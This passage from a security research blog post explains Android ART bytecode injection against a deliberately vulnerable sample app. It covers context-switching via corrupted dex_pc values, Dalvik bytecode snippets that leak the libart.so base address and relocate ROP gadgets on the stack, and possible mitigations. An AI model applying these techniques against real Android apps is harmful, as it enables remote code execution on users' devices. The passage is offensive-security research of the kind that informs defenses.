Next, the payload must be stored to a stable region on the stack. Most importantly, no data structures required to continue the execution of the (hijacked) bytecode method that called the writeIndexed method need to be corrupted. So, with some testing, it turns out that the payload may be moved 0x1000 bytes behind the buffer base address, i.e. starting at index 0x1000 / 8 = 0x200.

For a PoC , consider the following video.

Context - Switching

In this section, I want to discuss a few approaches on how to handle insufficient contexts during bytecode injection. A major problem is if the context available does not provide enough types or methods to do anything useful. For example, if we were missing the StringBuilder type in the above case study, then the payload would not work. Of course, as is discussed later , we could try to use bytecode as an intermediate stage in case the context is insufficient.

Alternatively, if an attacker wants to only execute bytecode, because e.g. native - level security mechanisms are preventing any kind of ROP, then the attacker will only be left with switching the context. As of writing, two ways to perform context - switching come to mind. All approaches work by corrupting a different dex_pc than the one that provides an insufficient context. In general, as long as an attacker can ensure that a dex_pc is executed eventually, that dex_pc may be used to switch the execution context. The following visualization shows the high - level idea of context - switching. Notice that the context is determined by an attacker’s goals.

The first approach is to try to corrupt an ArtMethod that is stored in a predictable location. For this to work, the method must be called after the attacker corrupted the dex_pc. Finding an ArtMethod instance is tricky and may require additional information leaks for a remote attacker. In a local setting, there exists a plethora of ArtMethods to be used by an attacker, e.g. in boot.art.

Secondly, if an attacker is only given the ability to corrupt stack values, then the bytecode method call chain can be traversed to find a fitting context. Because the Android runtime is complex, often plenty of method invocations are performed until the vulnerable native method is called eventually. This leaves room to corrupt other dex_pcs belonging to parent methods. However, if an attacker is unable to go up the call chain, then it may be possible to go down the call chain. To that end, an attacker needs to be able to invoke a method that takes in a callback. If an attacker is able to pass a callback consisting of custom bytecode into a method, then this will result in a new call chain until the callback is invoked. These ideas are visualized in the following diagram.

Basically, the above figure shows stack frames matching a call chain. On the left, an attacker corrupts any spilled dex_pc on the stack, potentially switching the context depending on what method is hijacked. On the right, an attacker somehow manages to pass custom bytecode into a method that eventually invokes that bytecode. From there on, an attacker can either use bytecode to corrupt a legitimate, calling method that stems from the callback call chain, or stay in the context of the callback. Notice, however, that specifying a callback most certainly requires knowledge on the class of the callback object. Therefore, specifying a callback requires knowing the context of the callback, which somewhat defeats the purpose of doing this in the first place.

Regardless of what approach is used, the absolute best context to end up in is in a .dex file of framework.jar. These .dex files contain a large fraction of the app - related Android runtime and thus provide a lot of types and methods. Moreover, because framework.jar is copied to all apps forked from zygote64, pure bytecode payloads for .dex files of framework.jar are universal for the target device under the assumption that framework.jar does not change.

Further Applications

The case study shows that bytecode injection can be used to fully take over a thread in the target app via a memory error. For the PoC, bytecode is used to invoke a system command.

However, it is also possible to use bytecode as an intermediate stage, e.g. to set up a ROP chain. To that end, remember that vregs are not bounds - checked. Therefore, any attacker - chosen bytecode can access, i.e. read and write, any value on the stack following the vregs and vrefs arrays of the hijacked method. Ignoring the fact that writing to e.g. v0 almost always writes to r0 as well, it is possible for bytecode to set up ROP gadgets on the stack by filling the right vregs and vrefs that overlap with a return address. Notice that one can use bytecode instructions like move-object to always write a value to both, vregs and vrefs. Then, an attacker can pretend to only write to vrefs to set up the ROP chain on the stack, fully ignoring the fact that writing to vrefs at some point overwrites the values stored in vregs.

In the example above, using ROP directly is most likely impossible, because an attacker is lacking knowledge on the location of an executable memory region to return into. However, because bytecode can read beyond the vregs array, an attacker can pick up a code pointer stored on the stack, e.g. a return address, and use it to compute the base address of the associated module. Of course, an attacker must be able to either identify the module to compute the base address, or handle segfaults to probe for the beginning of the memory region. Given the base address, an attacker can then relocate their own gadgets stored inside the bytecode, e.g. as constants encoded inside instructions, to obtain a fully functional ROP chain. Then, what is left is to link the ROP chain into a return address, which kicks off gadget chain execution.

For example, the following bytecode can be used to grab the base address of libart.so. Notice that return_address_vreg_index and return_address_offset are to be chosen by an attacker and mean the index of the return address in terms of vregs and the offset of the return address relative to libart.so, respectively.

move-wide/16    v0, <return_address_vreg_index>
const-wide      v2, <return_address_offset>
sub-long        v0, v0, v2

Once a fitting ROP chain is found, parts of the chain must be marked for dynamic relocation. An example of a ROP chain component that does not need relocation is a command string. Of course, if working with the address of the command string, relocation will be necessary again. Consider the generic bytecode for relocating ROP gadgets:

const-wide      v2, gadget
add-long        v2, v2, v<libart_base_vreg_index>
move-object16   v<2 * index + return_address_vreg_index>, v2
move-object16   v<2 * index + return_address_vreg_index + 1>, v3

In a nutshell, gadget is the offset of the current gadget relative to libart.so. The offset is stored to v2 and v3 (64 - bit in total) and added to the vreg that holds the base address of libart.so. Results are stored into v2. Afterwards, move-object16 is utilized to lower and upper 32 - bit values of the relocated address into vregs and vrefs that represent the current ROP chain gadget on the stack. The above code snippet is executed for each ROP gadget, which means the ROP chain is built up one by one at runtime. This is only possible, because vreg and vref indices are not bounds - checked at runtime. Furthermore, observe that gadget offsets are stored inside bytecode and relocated using spilled libart leak.

Without discussing all the details of the PoC exploit, the following visualization aims to highlight the general idea of using bytecode to relocate a ROP chain.

Visualization of bytecode - based ROP attack

And finally, to finish off the idea of bytecode - induced ROP attacks, a PoC video is provided!

Another interesting approach may be to look into similar bytecode - related exploitation areas, like V8 . Usually, when exploiting a bug in V8, an attacker builds up primtives like fakeobj and addrof, which are often escalated into read and write primitives. Without having looked into this thoroughly, it may be possible to use the same ideas when injecting bytecode to construct and access objects that allow reading from and writing to arbitrary memory regions. However, a limiting factor seems to be that object references are always 32 - bit addresses. Luckily, there exist classes like Parcel and its associated C++ implementation that store 64-bit pointers inside objects. Taking into account that Parcel provides methods like writeLong that writes a 64-bit value to a location relative to an internal pointer, Parcel seems like the perfect candidate to build up WWW and RWW primitives from bytecode. Furthermore, Parcel is a very common class and thus available in a plethora of contexts. Unfortunately, due to time constraints, I have not been able to construct a PoC for this idea.

Possible Mitigations

Following native - level mitigations against code injection, the first idea that comes to mind is to somehow force nterp to distinguish between code and data. For example, it may be possible to restrict dex_ptr to .dex files only. However, even inside a .dex file, data and code are mixed. For example, the code_item of a method in a .dex file consists of metadata describing and the concrete bytecode representing the method. Therefore, restricting bytecode execution to .dex files does not suffice, unless it can be guaranteed that redirecting bytecode execution to data structures in a .dex file does not suffice for a successful exploit, which is impossible. Because data and bytecode are closely coupled in memory, nterp cannot use page permissions either: the page permissions are to coarse.

Another approach could be to redesign the layout of .dex files, so that bytecode is stored in executable readonly regions, whereas associated data structures are stored in adjacent readonly memory. Whether this is practical or not is to be determined. Such a major redesign would also need rigorous permission checks, because nterp does not have hardware support that prevents execution of non - executable memory.

Summary

In this blog post, the first bytecode - based exploitation technique, namely bytecode injection, is discussed and demonstrated using a simplistic, deliberately vulnerable Android app. Various caveats regarding bytecode injection, like String construction, method invocation and even insufficient contexts, are explained and solved. Furthermore, it is highlighted how bytecode may function as a stepping stone for other attacks like ROP.

A neat side - effect is that bytecode is architecture - agnostic. Only changes to the bytecode interpreter can prevent that bytecode shellcode executes successfully. Because it is possible to create Android apps for various older Android versions, shellcode can most certainly be constructed as backward - compatible as an app can be.

Bytecode Injection (Part 3)

Table of Contents

Bytecode Injection (Part 3)

Motivation

The Problems

Sample App

Bytecode Injection

Building a Bytecode Payload

Dynamic Strings

Problem with String Constructors

Dynamic Method Invocation

Limited, dynamic Vregs

The Payload

The Attack

Context - Switching

Further Applications

Possible Mitigations

Summary